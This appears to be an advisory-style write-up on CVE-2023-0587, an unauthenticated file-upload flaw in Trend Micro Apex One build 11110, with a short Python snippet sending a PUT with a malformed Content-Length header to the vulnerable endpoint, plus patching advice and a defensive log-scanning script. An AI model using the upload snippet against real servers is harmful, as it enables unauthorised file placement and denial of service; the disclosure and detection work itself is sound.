A critical file-upload vulnerability has been identified in Trend Micro Apex One server build 11110. Using a malformed Content-Length header in an HTTP PUT message, an unauthenticated remote attacker can upload arbitrary files to the SampleSubmission directory on the server. The attacker can upload a large number of large files to fill up the file system on which the Apex One server is installed.

Exploit Details

The vulnerability, identified as CVE-2023-0587, exists in the Trend Micro Apex One server build 11110. An unauthenticated remote attacker can exploit this vulnerability by sending an HTTP PUT message with a malformed Content-Length header to the URL /officescan/console/html/cgi/fcgiOfcDDA.exe.

Here is a code snippet demonstrating how an attacker could craft an HTTP PUT message with a malformed Content-Length header:

import requests

target_url = 'http://target_server_ip/officescan/console/html/cgi/fcgiOfcDDA.exe'
file_to_upload = 'path_to_file'
malformed_content_length = '999999999'

headers = {
    "Content-Length": malformed_content_length,
    # ... (remaining headers elided in the original)
}

with open(file_to_upload, 'rb') as file:
    response = requests.put(target_url, headers=headers, data=file)

By exploiting this vulnerability, the attacker can upload arbitrary files to the SampleSubmission directory (i.e., \PCCSRV\TEMP\SampleSubmission) on the server. Repeated uploads can fill up the file system on which the Apex One server is installed, resulting in a denial-of-service (DoS) condition.

Original References

[1] Trend Micro Apex One - Official Documentation: https://docs.trendmicro.com/en-us/enterprise/trend-micro-apex-one.aspx
[2] CVE-2023-0587 - NVD - National Vulnerability Database: https://nvd.nist.gov/vuln/detail/CVE-2023-0587

Mitigation

Trend Micro has addressed this vulnerability in the latest update for the Apex One server and recommends that users update their Apex One installations to the most recent version, which includes a patch for this vulnerability. Users should also follow network best practices, such as limiting access to the Apex One server to trusted IP addresses and using strong access controls.
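
To check whether the endpoint is being reached from outside the trusted address ranges, the following added example (not from Trend Micro or the original advisory) counts PUT requests to fcgiOfcDDA.exe per untrusted client IP in web server logs. It assumes IIS W3C extended logs with a #Fields: directive; the function name, sample log lines and trusted range are constructed for illustration.

```python
import ipaddress
from collections import Counter

# Endpoint named in the advisory, lowercased for case-insensitive comparison.
ENDPOINT = "/officescan/console/html/cgi/fcgiofcdda.exe"

# Constructed sample log (assumed W3C extended layout, documentation IP ranges).
SAMPLE_LOG = """\
#Fields: date time cs-method cs-uri-stem c-ip sc-status
2023-02-02 10:00:01 PUT /officescan/console/html/cgi/fcgiOfcDDA.exe 10.0.5.20 200
2023-02-02 10:00:02 PUT /officescan/console/html/cgi/fcgiOfcDDA.exe 203.0.113.7 200
2023-02-02 10:00:03 PUT /officescan/console/html/cgi/fcgiOfcDDA.exe 203.0.113.7 200
2023-02-02 10:00:04 GET /officescan/console/html/cgi/fcgiOfcDDA.exe 198.51.100.9 200
#Fields: date time c-ip cs-method cs-uri-stem sc-status
2023-02-02 10:05:00 203.0.113.7 PUT /OfficeScan/console/html/cgi/fcgiofcdda.exe 200
"""


def untrusted_puts(lines, trusted_cidrs):
    """Count PUT requests to ENDPOINT per client IP outside trusted_cidrs."""
    trusted = [ipaddress.ip_network(c) for c in trusted_cidrs]
    fields, hits = [], Counter()
    for line in lines:
        line = line.strip()
        if line.startswith("#Fields:"):
            fields = line.split()[1:]  # column order can change mid-file
            continue
        if not line or line.startswith("#") or not fields:
            continue
        row = dict(zip(fields, line.split()))
        if row.get("cs-method", "").upper() != "PUT":
            continue
        if row.get("cs-uri-stem", "").lower() != ENDPOINT:
            continue
        try:
            client = ipaddress.ip_address(row.get("c-ip", ""))
        except ValueError:
            continue  # skip rows with a malformed client address
        if not any(client in net for net in trusted):
            hits[str(client)] += 1
    return hits


if __name__ == "__main__":
    for ip, count in untrusted_puts(SAMPLE_LOG.splitlines(), ["10.0.0.0/8"]).most_common():
        print(f"{ip}\t{count} PUT request(s) to {ENDPOINT}")
```

A high count from a single source, together with growth of the \PCCSRV\TEMP\SampleSubmission directory, is worth investigating.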

Conclusion

This unauthenticated file-upload vulnerability in Trend Micro Apex One server build 11110 demonstrates the importance of staying up to date with the latest patches and updates for all software applications, especially those that are critical for your organization's security posture. By keeping your applications updated, regularly reviewing log files, and implementing proper access controls, you can greatly reduce the risks associated with these types of vulnerabilities.

Timeline

Published on: 02/01/2023 03:15:00 UTC
Last modified on: 02/07/2023 22:44:00 UTC